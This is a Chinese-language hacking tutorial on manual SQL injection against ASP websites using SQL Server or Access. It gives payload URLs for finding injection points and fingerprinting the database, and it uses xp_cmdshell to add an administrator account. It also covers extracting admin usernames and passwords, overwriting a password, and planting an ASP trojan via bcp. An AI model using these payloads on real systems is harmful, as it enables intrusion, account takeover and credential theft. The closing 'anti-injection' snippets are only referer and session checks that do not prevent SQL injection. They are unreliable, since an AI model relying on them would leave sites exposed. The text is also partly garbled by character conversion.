SQL注入思路與手工猜解大進階

什麼叫SQL注入？

許多網站程序在編寫時，沒有對用戶輸入數據的合法性進行判斷，使應用程序存在安全隱患。用戶能夠提交一段數據庫查詢代碼，（通常是在瀏覽器地址欄進行,經過正常的www端口訪問）根據程序返回的結果，得到某些他想得知的數據，這就是所謂的SQL Injection，即SQL注入。

SQL注入的思路

思路最重要。其實好多人都不知道SQL到底能作什麼呢？這裏總結一下SQL注入入侵的整體的思路：

1. SQL注入漏洞的判斷，即尋找注入點

2. 判斷後臺數據庫類型

3. 肯定XP_CMDSHELL可執行狀況；若當前鏈接數據的賬號具備SA權限(這是SQL系統中的最高權限)，且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程能夠直接使用操做系統的shell)可以正確執行，則整個計算機能夠經過幾種方法徹底控制，也就完成了整個注入過程，不然繼續：

1. 發現WEB虛擬目錄

2. 上傳ASP木馬；

3. 獲得管理員權限

具體步驟：

1、SQL注入漏洞的判斷

若是之前沒玩過注入，請把IE菜單-工具-Internet選項－高級－顯示友好HTTP錯誤信息前面的勾去掉。

爲了把問題說明清楚，如下以HTTP://www.2cto.com/news.asp?id=xx(這個地址是假想的)，爲例進行分析，xx多是整型，也有多是字符串。

一、整型參數的判斷

當輸入的參數xx爲整型時，一般news.asp中SQL語句原貌大體以下：

select * from 表名 where 字段=xx，因此能夠用如下步驟測試SQL注入是否存在。

最簡單的判斷方法

HTTP://www.2cto.com/news.asp?id=xx’(附加一個單引號)，

此時news.asp中的SQL語句變成了

select * from 表名 where 字段=xx’，

若是程序沒有過濾好「’」的話，就會提示 news.asp運行異常；但這樣的方法雖然很簡單，但並非最好的，由於：

first,不必定每臺服務器的IIS都返回具體錯誤提示給客戶端，若是程序中加了cint(參數)之類語句的話，SQL注入是不會成功的，但服務器一樣會報錯，具體提示信息爲處理 URL 時服務器上出錯。請和系統管理員聯絡。

second，目前大多數程序員已經將「’「 過濾掉，因此用」 ’」測試不到注入點，因此通常使用經典的1=1和1=2測試方法，見下文：

HTTP://www.2cto.com/news.asp?id=xx and 1=1, news.asp運行正常，

並且與HTTP://www.2cto.com/news.asp?id=xx運行結果相同；

HTTP://www.2cto.com/news.asp?id=xx and 1=2, news.asp運行異常；（這就是經典的 1=1 1=2 判斷方法）

若是以上面知足，news.asp中就會存在SQL注入漏洞，反之則可能不能注入。

二、字符串型參數的判斷

方法與數值型參數判斷方法基本相同

當輸入的參數xx爲字符串時，一般news.asp中SQL語句原貌大體以下：

select * from 表名 where 字段=’xx’，因此能夠用如下步驟測試SQL注入是否存在。

HTTP://www.2cto.com/news.asp?id=xx’(附加一個單引號)，此時news.asp中的SQL語句變成了
select * from 表名 where 字段=xx’，news.asp運行異常；
HTTP://www.2cto.com/news.asp?id=xx and '1’=’1′, news.asp運行正常，

並且與HTTP://www.2cto.com/news.asp?id=xx運行結果相同；

HTTP://www.2cto.com/news.asp?id=xx and '1’=’2′, news.asp運行異常；

若是以上知足，則news.asp存在SQL注入漏洞，反之則不能注入

三、特殊狀況的處理

有時ASP程序員會在程序員過濾掉單引號等字符，以防止SQL注入。此時能夠用如下幾種方法試一試。

①大小定混合法：因爲VBS並不區分大小寫，而程序員在過濾時一般要麼所有過濾大寫字符串，要麼所有過濾小寫字符串，而大小寫混合每每會被忽視。如用SelecT代替select,SELECT等；

②UNICODE法：在IIS中，以UNICODE字符集實現國際化，咱們徹底能夠IE中輸入的字符串化成UNICODE字符串進行輸入。如+ =%2B，空格=%20 等；

③ASCII碼法：能夠把輸入的部分或所有字符所有

四、除了上述方法之外，還有個更簡單的方法就是使用現成的工具好比NBSI，啊D注入工具就是一款很不錯的工具，目前最新的版本爲2.2

2、判斷數據庫類型

不一樣的數據庫的函數、注入方法都是有差別的，因此在注入以前，咱們還要判斷一下數據庫的類型。通常ASP最常搭配的數據庫是Access和SQLServer，網上超過99%的網站都是其中之一。

怎麼讓程序告訴你它使用的什麼數據庫呢？來看看：

SQLServer有一些系統變量，若是服務器IIS提示沒關閉，而且SQLServer返回錯誤提示的話，那能夠直接從出錯信息獲取，方法以下：
HTTP://www.2cto.com/news.asp?id=xx;and user＞0

這句語句很簡單，但卻包含了SQLServer特有注入方法的精髓，我本身也是在一次無心的測試中發現這種效率極高的猜解方法。讓我看來看看它的含義：首先，前面的語句是正常的，重點在and user＞0，咱們知道，user是SQLServer的一個內置變量，它的值是當前鏈接的用戶名，類型爲nvarchar。拿一個 nvarchar的值跟int的數0比較，系統會先試圖將nvarchar的值轉成int型，固然，轉的過程當中確定會出錯，SQLServer的出錯提示是：將nvarchar值 」abc」 轉換數據類型爲 int 的列時發生語法錯誤，呵呵，abc正是變量user的值，這樣，不廢吹灰之力就拿到了數據庫的用戶名。在之後的篇幅裏，你們會看到不少用這種方法的語句。 順便說幾句，衆所周知，SQLServer的用戶sa是個等同Adminstrators權限的角色，拿到了sa權限，幾乎確定能夠拿到主機的 Administrator了。上面的方法能夠很方便的測試出是不是用sa登陸，要注意的是：若是是sa登陸，提示是將」dbo」轉換成int的列發生錯誤，而不是「sa」。

若是服務器IIS不容許返回錯誤提示，那怎麼判斷數據庫類型呢？咱們能夠從Access和SQLServer和區別入手，Access和 SQLServer都有本身的系統表，好比存放數據庫中全部對象的表，Access是在系統表[msysobjects]中，但在Web環境下讀該表會提示「沒有權限」，SQLServer是在表[sysobjects]中，在Web環境下可正常讀取。

在確承認以注入的狀況下，使用下面的語句：

HTTP://www.2cto.com/news.asp?id=xx ;and (select count(*) from sysobjects)＞0
HTTP://www.2cto.com/news.asp?id=xx ;and (select count(*) from msysobjects)＞0

若是數據庫是SQLServer，那麼第一個網址的頁面與原頁面HTTP://www.2cto.com/news.asp?id=xx是大體相同的；而第二個網址，因爲找不到表msysobjects，會提示出錯，就算程序有容錯處理，頁面也與原頁面徹底不一樣。

若是數據庫用的是Access，那麼狀況就有所不一樣，第一個網址的頁面與原頁面徹底不一樣；第二個網址，則視乎數據庫設置是否容許讀該系統表，通常來講是不容許的，因此與原網址也是徹底不一樣。大多數狀況下，用第一個網址就能夠得知系統所用的數據庫類型，第二個網址只做爲開啓IIS錯誤提示時的驗證。

3、肯定XP_CMDSHELL可執行狀況

若當前鏈接數據的賬號具備SA權限，且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程能夠直接使用操做系統的shell)可以正確執行，則整個計算機能夠經過如下幾種方法徹底控制，之後的全部步驟均可以省

一、HTTP://www.2cto.com/news.asp?id=xx and user＞;0 news.asp執行異常但能夠獲得當前鏈接數據庫的用戶名(若顯示dbo則表明SA)。

二、HTTP://www.2cto.com/news.asp?id=xx and db_name()＞0 news.asp執行異常但能夠獲得當前鏈接的數據庫名。

三、HTTP://www.2cto.com/news.asp?id=xx；exec master..xp_cmdshell 「net user aaa bbb /add」– (master是SQL-SERVER的主數據
庫；名中的分號表示SQL-SERVER執行完分號前的語句名，繼續執行其後面的語句；「—」號是註解，表示其後面的全部內容僅爲註釋，系統並不執行)能夠直接增長操做系統賬戶aaa,密碼爲bbb。

四、HTTP://www.2cto.com/news.asp?id=xx；exec master..xp_cmdshell 「net localgroup administrators aaa /add」– 把剛剛增長
的賬戶aaa加到administrators組中。

五、HTTP://www.2cto.com/news.asp?id=xx；backuup database 數據庫名 to disk=’c:\inetpub\wwwroot\save.db’ 則把獲得的數據內容
所有備份到WEB目錄下，再用HTTP把此文件下載(固然首選要知道WEB虛擬目錄)。

六、經過複製CMD建立UNICODE漏洞

HTTP://www.2cto.com/news.asp?id=xx;exec master.dbo.xp_cmdshell 「copy c:\winnt\system32\cmd.exe

c:\inetpub\scripts\cmd.exe」 便製造了一個UNICODE漏洞，經過此漏洞的利用方法，便完成了對整個計算機的控制(固然首選要知道WEB虛擬目錄)。

這樣你就成功的完成了一次SQL注入攻擊了！這個時候

當上述條件不成立時就要繼續下面的步驟
(一)、發現WEB虛擬目錄

只有找到WEB虛擬目錄，才能肯定放置ASP木馬的位置，進而獲得USER權限。有兩種方法比較有效。

一是根據經驗猜解，通常來講，WEB虛擬目錄是：c:\inetpub\wwwroot;

D:\inetpub\wwwroot; E:\inetpub\wwwroot等，而可執行虛擬目錄是：
c:\inetpub\scripts; D:\inetpub\scripts; E:\inetpub\scripts等。

二是遍歷系統的目錄結構，分析結果並發現WEB虛擬目錄；

先建立一個臨時表：temp

HTTP://www.2cto.com/news.asp?id=xx;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3
nvarchar(255));–

接下來：

1 咱們能夠利用xp_availablemedia來得到當前全部驅動器,並存入temp表中：

HTTP://www.2cto.com/news.asp?id=xx;insert temp exec master.dbo.xp_availablemedia;–

咱們能夠經過查詢temp的內容來得到驅動器列表及相關信息

2 咱們能夠利用xp_subdirs得到子目錄列表,並存入temp表中：

HTTP://www.2cto.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_subdirs ‘c:\';–

3 咱們還能夠利用xp_dirtree得到全部子目錄的目錄樹結構,並寸入temp表中：

HTTP://www.2cto.com/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree ‘c:\';–

這樣就能夠成功的瀏覽到全部的目錄（文件夾）列表：

若是咱們須要查看某個文件的內容，能夠經過執行xp_cmdsell：

HTTP://www.2cto.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell ‘type c:\web\index.asp';–

使用’bulk insert’語法能夠將一個文本文件插入到一個臨時表中。如：bulk insert temp(id) from ‘c:\inetpub\wwwroot\index.asp’
瀏覽temp就能夠看到index.asp文件的內容了！經過分析各類ASP文件，能夠獲得大量系統信息，WEB建設與管理信息，甚至能夠獲得SA賬號的鏈接密碼。

固然，若是xp_cmshell可以執行，咱們能夠用它來完成：

HTTP://www.2cto.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell ‘dir c:\';–
HTTP://www.2cto.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell ‘dir c:\ *.asp /s/a';–

經過xp_cmdshell咱們能夠看到全部想看到的，包括W3svc

HTTP://www.2cto.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell ‘cscript
C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc’

可是，若是不是SA權限，咱們還可使用

HTTP://www.2cto.com/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree ‘c:\';–

注意：

一、以上每完成一項瀏覽後，應刪除TEMP中的全部內容，刪除方法是：

HTTP://www.2cto.com/news.asp?id=xx;delete from temp;–

二、瀏覽TEMP表的方法是：(假設TestDB是當前鏈接的數據庫名)
HTTP://www.2cto.com/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp )＞0

獲得表TEMP中第一條記錄id字段的值，並與整數進行比較，顯然news.asp工做異常，但在異常中卻能夠發現id字段的值。假設發現的表名是xyz，則

HTTP://www.2cto.com/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp )＞0 where id not in(‘xyz’))＞0

獲得表TEMP中第二條記錄id字段的值。

(二)、上傳ASP木馬

所謂ASP木馬，就是一段有特殊功能的ASP代碼，並放入WEB虛擬目錄的Scripts下，遠程客戶經過IE就可執行它，進而獲得系統的USER權限，實現對系統的初步控制。上傳ASP木馬通常有兩種比較有效的方法：

一、利用WEB的遠程管理功能

許多WEB站點，爲了維護的方便，都提供了遠程管理的功能；也有很多WEB站點，其內容是對於不一樣的用戶有不一樣的訪問權限。爲了達到對用戶權限的控制，都有一個網頁，要求用戶名與密碼，只有輸入了正確的值，才能進行下一步的操做,能夠實現對WEB的管理，如上傳、下載文件，目錄瀏覽、修改配置等。

所以，若獲取正確的用戶名與密碼，不只能夠上傳ASP木馬，有時甚至可以直接獲得USER權限而瀏覽系統，上一步的「發現WEB虛擬目錄」的複雜操做均可省略。

用戶名及密碼通常存放在一張表中，發現這張表並讀取其中內容便解決了問題。如下給出兩種有效方法。

A、 注入法：

從理論上說，認證網頁中會有型如：

select * from admin where username=’XXX’ and password=’YYY’ 的語句，若在正式運行此句以前，沒有進行必要的字符過濾，則很容易實施SQL注入。

如在用戶名文本框內輸入：abc’ or 1=1– 在密碼框內輸入：123 則SQL語句變成：

select * from admin where username=’abc’ or 1=1 and password=’123’

無論用戶輸入任何用戶名與密碼，此語句永遠都能正確執行，用戶輕易騙過系統，獲取合法身份。

B、猜解法：

基本思路是：猜解全部數據庫名稱，猜出庫中的每張表名，分析多是存放用戶名與密碼的表名，猜出表中的每一個字段名，猜出表中的每條記錄內容。

a 猜解全部數據庫名稱

HTTP://www.2cto.com/news.asp?id=xx and (select count(*) from master.dbo.sysdatabases where name＞1 and dbid=6) ＜＞0

由於dbid的值從1到5，是系統用了。因此用戶本身建的必定是從6開始的。而且咱們提交了 name＞1 (name字段是一個字符型的字段和數字比較會出錯),news.asp工做異常，可獲得第一個數據庫名，同理把DBID分別改爲7,8，9,10,11,12…就可獲得全部數據庫名。

如下假設獲得的數據庫名是TestDB。

b 猜解數據庫中用戶名錶的名稱

猜解法：此方法就是根據我的的經驗猜表名，通常來講，

user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,
systemusers,sysuser,sysusers,sysaccounts,systemaccounts等。並經過語句進行判斷

HTTP://www.2cto.com/news.asp?id=xx and (select count(*) from TestDB.dbo.表名)＞0 若表名存在，則news.asp工做正常，不然異常。如此循環，直到猜到系統賬號表的名稱。

讀取法：SQL-SERVER有一個存放系統核心信息的表sysobjects，有關一個庫的全部表，視圖等信息所有存放在此表中，並且此表能夠經過WEB進行訪問。

當xtype=’U’ and status＞0表明是用戶創建的表，發現並分析每個用戶創建的表及名稱，即可以獲得用戶名錶的名稱，基本的實現方法是：

①HTTP://www.2cto.com/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype=’U’ and status＞0 )＞0
獲得第一個用戶創建表的名稱，並與整數進行比較，顯然news.asp工做異常，但在異常中卻能夠發現表的名稱。假設發現的表名是xyz，則

②HTTP://www.2cto.com/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype=’U’ and status＞0 and
name not in(‘xyz’))＞0 能夠獲得第二個用戶創建的表的名稱，同理就可獲得全部用創建的表的名稱。

根據表的名稱，通常能夠認定那張表用戶存放用戶名及密碼，如下假設此表名爲Admin。
c 猜解用戶名字段及密碼字段名稱

admin表中必定有一個用戶名字段，也必定有一個密碼字段，只有獲得此兩個字段的名稱，纔有可能獲得此兩字段的內容。如何獲得它們的名稱呢，一樣有如下兩種方法。

猜解法：此方法就是根據我的的經驗猜字段名，通常來講，用戶名字段的名稱經常使用：username,name,user,account等。而密碼字段的名稱經常使用：password,pass,pwd,passwd等。並經過語句進行判斷

HTTP://www.2cto.com/news.asp?id=xx and (select count(字段名) from TestDB.dbo.admin)＞0 「select count(字段名) from 表名」

語句獲得表的行數，因此若字段名存在，則news.asp工做正常，不然異常。如此循環，直到猜到兩個字段的名稱。

讀取法：基本的實現方法是

HTTP://www.2cto.com/news.asp?id=xx and (select top 1 col_name(object_id(‘admin’),1) from TestDB.dbo.sysobjects)＞0 。
select top 1 col_name(object_id(‘admin’),1) from TestDB.dbo.sysobjects是從sysobjects獲得已知表名的第一個字段名，當與整數進行比較，顯然news.asp工做異常，但在異常中卻能夠發現字段的名稱。把col_name(object_id(‘admin’),1)中的1依次換成2,3,4,5，6…就可獲得全部的字段名稱。

d 猜解用戶名與密碼

猜用戶名與密碼的內容最經常使用也是最有效的方法有：

ASCII碼逐字解碼法:雖然這種方法速度較慢，但確定是可行的。基本的思路是先猜出字段的長度，而後依次猜出每一位的值。猜用戶名與猜密碼的方法相同，如下以猜用戶名爲例說明其過程。

HTTP://www.2cto.com/news.asp?id=xx and (select top 1 len(username) from TestDB.dbo.admin)=X(X=1,2，3,4，5，… n，username

爲用戶名字段的名稱，admin爲表的名稱)，若x爲某一值i且news.asp運行正常時，則i就是第一個用戶名的長度。如：當輸入
HTTP://www.2cto.com/news.asp?id=xx and (select top 1 len(username) from TestDB.dbo.admin)=8時news.asp運行正常，則第一個用戶名的長度爲8

HTTP://www.2cto.com/news.asp?id=xx and (select top 1 ascii(substring(username,m,1)) from TestDB.dbo.admin)=n (m的值在1到上一步獲得的用戶名長度之間，當m=1，2,3，…時猜想分別猜想第1,2,3,…位的值；n的值是1~九、a~z、A~Z的ASCII值，也就是1~128之間的任意值；admin爲系統用戶賬號表的名稱)，若n爲某一值i且news.asp運行正常時，則i對應ASCII碼就是用戶名某一位值。如：當輸入
HTTP://www.2cto.com/news.asp?id=xx and (select top 1 ascii(substring(username,3,1)) from TestDB.dbo.admin)=80時news.asp運行正常，則用戶名的第三位爲P(P的ASCII爲80)；HTTP://www.2cto.com/news.asp?id=xx and (select top 1 ascii(substring(username,9,1)) from TestDB.dbo.admin)=33時news.asp運行正常，則用戶名的第9位爲!(!的ASCII爲80)；猜到第一個用戶名及密碼後，同理，能夠猜出其餘全部用戶名與密碼。注意：有時獲得的密碼多是經MD5等方式加密後的信息，還須要用專用工具進行脫密。或者先改其密碼，使用完後再改回來，見下面說明。簡單法：猜用戶名用HTTP://www.2cto.com/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where username＞1) , flag是admin表中的一個字段，username是用戶名字段，此時news.asp工做異常，但能獲得Username的值。與上一樣的方法，能夠獲得第二用戶名，第三個用戶等等，直到表中的全部用戶名。

猜用戶密碼：HTTP://www.2cto.com/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where pwd＞1) , flag是admin表中的一個字段，pwd是密碼字段，此時news.asp工做異常，但能獲得pwd的值。與上一樣的方法，能夠獲得第二用戶名的密碼，第三個用戶的密碼等等，直到表中的全部用戶的密碼。密碼有時是經MD5加密的，能夠改密碼。

HTTP://www.2cto.com/news.asp?id=xx;update TestDB.dbo.admin set pwd=’ a0b923820dcc509a’ where username=’www';– ( 1的MD5值爲：AAABBBCCCDDDEEEF，即把密碼改爲1；www爲已知的用戶名)用一樣的方法固然可把密碼改原來的值。

二、利用表內容導成文件功能

SQL有BCP命令，它能夠把表的內容導成文本文件並放到指定位置。利用這項功能，咱們能夠先建一張臨時表，而後在表中一行一行地輸入一個ASP木馬，而後用BCP命令導出造成ASP文件。

命令行格式以下：

bcp 「select * from text..foo」 queryout c:\inetpub\wwwroot\163.asp –c –S localhost –U sa –P foobar
(‘S’參數爲執行查詢的服務器，’U’參數爲用戶名，’P’參數爲密碼，最終上傳了一個163.asp的木馬)

三、利用工具，如NBSI給出的一些參考數據最重要的表名：

select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses

最重要的一些用戶名（默認sql數據庫中存在着的）

public
dbo
guest(通常禁止，或者沒權限)
db_sercurityadmin
ab_dlladmin
一些默認擴展
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia 驅動器相關
xp_dirtree 目錄
xp_enumdsn ODBC鏈接
xp_loginconfig 服務器安全模式信息
xp_makecab 建立壓縮卷
xp_ntsec_enumdomains domain信息
xp_terminate_process 終端進程，給出一個PID
(三)、獲得系統的管理員權限

ASP木馬只有USER權限，要想獲取對系統的徹底控制，還要有系統的管理員權限。怎麼辦？提高權限的方法有不少種：

上傳木馬，修改開機自動運行的.ini文件(它一重啓，便死定了)；

複製CMD.exe到scripts，人爲製造UNICODE漏洞；

下載SAM文件，破解並獲取OS的全部用戶名密碼；

等等，視系統的具體狀況而定，能夠採起不一樣的方法。

那麼咱們怎麼防注入呢？程序以下加入到asp或html或php或cgi裏面均可以。通過測試。加入如 top.asp文件中開頭

 

方法一(只要有用戶注入則跳轉到../../目錄)：

＜%if session(「username」=」」 or session(「userkey」=」」 then
response.redirect 「../../」
end if%＞

 

方法二(只要有用戶注入則判斷爲外部鏈接)：

＜%
server_v1=Cstr(Request.ServerVariables(「HTTP_REFERER」)
server_v2=Cstr(Request.ServerVariables(「SERVER_NAME」)
if mid(server_v1,8,len(server_v2))＜＞server_v2 then
response.write 「＜br＞＜br＞＜center＞＜table border=1 cellpadding=20 bordercolor=black bgcolor=#EEEEEE width=450＞」
response.write 「＜tr＞＜td style=「font:9pt Verdana「＞」
response.write 「你提交的路徑有誤，禁止從站點外部提交數據請不要亂該參數！」
response.write 「＜/td＞＜/tr＞＜/table＞＜/center＞」
response.end
end if
%＞

 

方法三(只要有用戶注入則跳轉到../目錄)：

＜% dim From_url,Serv_urlFrom_url = Cstr(Request.ServerVariables(「HTTP_REFERER」)Serv_url = Cstr(Request.ServerVariables(「SERVER_NAME」)if mid(From_url,8,len(Serv_url)) ＜＞ Serv_url thenresponse.write 「NO」response.redirect(「../」response.endend if%＞